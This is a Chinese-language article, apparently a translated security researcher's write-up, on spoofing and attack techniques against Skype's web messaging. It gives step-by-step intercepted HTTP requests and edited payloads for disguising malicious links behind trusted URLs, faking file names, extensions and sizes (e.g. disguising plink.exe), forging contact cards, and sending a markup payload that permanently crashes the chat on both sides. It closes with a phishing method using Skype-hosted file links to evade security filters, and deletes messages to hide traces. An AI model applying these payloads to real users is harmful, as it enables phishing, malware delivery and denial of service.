针对Skype的欺骗&攻击研究

众所周知，Skype存在大量欺诈攻击漏洞，但微软不认为这些漏洞需要立即提供安全维修服务。

漏洞介绍

在我们的漏洞挖掘过程中，我们对web.skype.com测试域名。经过完整的测试，我们发现其信息功能中没有防止信息篡改的安全保护机制，因此可能存在欺骗和攻击的风险。本文发表时，所有提到的漏洞仍然存在。然而，微软并不认为这些漏洞太严重，需要立即修复，但可能会在未来的版本中修复。

链接欺骗

如果你想让某人访问链接，它实际上是非常简单和有效的。让我们看看该怎么办！

第一步，以下形式发送您想要伪装的链接：

第二步是拦截请求，在查看以下请求内容后转发：

POST /v1/users/ME/conversations/19%REDACTED%40thread.skype/messages?x-ecs-etag= HTTP/1.1Host: azwus1-client-s.gateway.messenger.live.com…{“clientmessageid”:”123456789″,“composetime”:”2021-02-01T23:05:32.546Z”,“content”:”<a href=”https://google.com”>https://google.com</a>”,“messagetype”:”RichText”,“contenttype”:”text”,“imdisplayname”:”mr d0x”><h1>hi</h1>”,“properties”:{ “urlpreviews”:”[{“key”:”https://google.com”,”value”:{“url”:”https://google.com”,”size”:”49128″,”status_code”:”200″,”content_type”:”text/html”,”site”:”www.google.com”,”category”:”generic”,”title”:”Google”,”description”:”Search the worlds information, including webpages, images, videos and more. Google has many special features to help you find exactly what youre looking for.”,”favicon”:”https://nus1-urlp-static.secure.skypeassets.com/static/google-32×32.ico”,”favicon_meta”:{“width”:32,”height”:32},”thumbnail”:”https://nus1-urlp-static.secure.skypeassets.com/static/google-90×90.png”,”thumbnail_meta”:{“width”:90,”height”:90},”user_pic”:””}}]” }}

第三步，请求href属性和属性urlpreviews”键的“key将您想要的链接插入属性：

…“content”:“<a href=”https://evil.com“>https://google.com</a>”,…“urlpreviews”:“[{“key“:”https://evil.com“,…

伪造的URL它将显示在信息的底部。为了克服这个问题，只需创建一个真正的子域。google.image.view.evil.com

文件名欺骗

在这个漏洞的帮助下，我们将能够使用伪造的文件名称和后缀向任何用户发送文件。我们发现了很多实现方法，但我们只演示了其中一个。

第一步是与任何用户聊天，然后点击Add files添加文件：

第二步，选择您的恶意文件：

第三步是发送消息并使用它Burp查看以下请求后，拦截信息并转发信息：

POST /v1/users/ME/conversations/19%REDACTED%40thread.skype/messages?x-ecs-etag= HTTP/1.1Host: azwus1-client-s.gateway.messenger.live.com…{“clientmessageid”: “6937674706420748491”,“composetime”: “2021-01-31T20:13:38.249Z”,“content”: “<URIObject uri=”https://api.asm.skype.com/v1/objects/0-cus-d17-REDACTED” url_thumbnail=”https://api.asm.skype.com/v1/objects/0-cus-d17-REDACTED/views/original” type=”File.1″ doc_id=”0-cus-d17-REDACTED”>To view this file, go to: <a href=”https://login.skype.com/login/sso?go=webclient.xmm&docid=0-cus-d17-REDACTED”>https://login.skype.com/login/sso?go=webclient.xmm&docid=0-cus-d17-REDACTED</a><OriginalName v=”plink.exe”></OriginalName><FileSize v=”311296″></FileSize></URIObject>”,“messagetype”: “RichText/Media_GenericFile”,“contenttype”: “text”,“imdisplayname”: “mr d0x”,“amsreferences”: [ “0-cus-d17-REDACTED” ]}

第四步修改OriginalName值，包括后缀名：

完成！目标用户将看到下图所示的界面：

点击“Download下载文件后，将显示原始文件名称：

欺骗文件大小

在这一步中，我们需要重复上述操作，但第四步需要修改。我们需要修改的是FileSize”值：

我们的文件现在变成了11TB：

共享名片欺骗

与他人分享联系人名片时，我们可以拦截并修改名片显示的名称和用户名，并将修改后的内容呈现给目标用户：

POST /v1/users/ME/conversations/19%REDACTED%40thread.skype/messages?x-ecs-etag= HTTP/1.1Host: azwus1-client-s.gateway.messenger.live.com…{“clientmessageid”:”31905252195064291″,“composetime”:”2021-01-31T20:02:39.230Z”,“content”:”<contacts><c t=”s” s=”evil.account” f=”Its Bob!”></c></contacts>”,“messagetype”:”RichText/Contacts”,“contenttype”:”text”,“imdisplayname”:”mr d0x”,“properties”:{ “forwardMetadata”:”{“isForwarded”:false}” }}

让任何用户Skype崩溃

在修改请求主体中content值时，我不小心放了太多的标签，导致对话两端(攻击者和目标用户)Skype崩溃，导致永久无法访问聊天内容。此外，每当双方试图打开对话框时，双方的Skype都会崩溃。

我所使用的Payload如下：

“content”:”<contacts><URIObject><h1><a href=“https://google.com ” t=“s” s=” ><contacts><c t=“s” s=“evil.account” f=“Mr.d0x“></c></contacts> </a></h1></URIObject></contacts>“

结果如下：

这将导致Web端和桌面客户端Skype都崩溃了。但是，手机端的Skpye应用程序不会崩溃。

使用Skype域名攻击网络钓鱼

当你在聊天框中发送文件时，它首先被上传到Skype在服务器上，然后聊天中的每个用户都可以访问文件。无论你是否是朋友，即使你删除了文件，其他用户仍然可以正常访问。

如果他们的文件链接现在可以通过电子邮件发送到目标，Outlook/O如果365账户上有活动会话，链接允许他们直接下载文件。

第一步是向目标用户发送或转发文件，忽略错误通知：

第二步是拦截请求，当您看到以下请求时转发请求：

POST /v1/users/ME/conversations/19%REDACTED%40thread.skype/messages?x-ecs-etag= HTTP/1.1Host: azwus1-client-s.gateway.messenger.live.com…{“clientmessageid”: “6937674706420748491”,“composetime”: “2021-01-31T20:13:38.249Z”,“content”: “<URIObject uri=”https://api.asm.skype.com/v1/objects/0-cus-d17-REDACTED” url_thumbnail=”https://api.asm.skype.com/v1/objects/0-cus-d17-REDACTED/views/original” type=”File.1″ doc_id=”0-cus-d17-REDACTED”>To view this file, go to: <a href=”https://login.skype.com/login/sso?go=webclient.xmm&docid=0-cus-d17-REDACTED”>https://login.skype.com/login/sso?go=webclient.xmm&docid=0-cus-d17-REDACTED</a><OriginalName v=”plink.exe”></OriginalName><FileSize v=”311296″></FileSize></URIObject>”,“messagetype”: “RichText/Media_GenericFile”,“contenttype”: “text”,“imdisplayname”: “mr d0x”,“amsreferences”: [ “0-cus-d17-REDACTED” ]}

位于下载链接url_thumbnail中：

https://api.asm.skype.com/v1/objects/0-cus-d17-REDACTED/views/original

第三步是删除消息以隐藏痕迹。

现在我们可以用这个链接攻击目标，因为Skype域名是一个值得信赖的域名，所以我们不必担心钓鱼邮件被安全产品标记或检测到。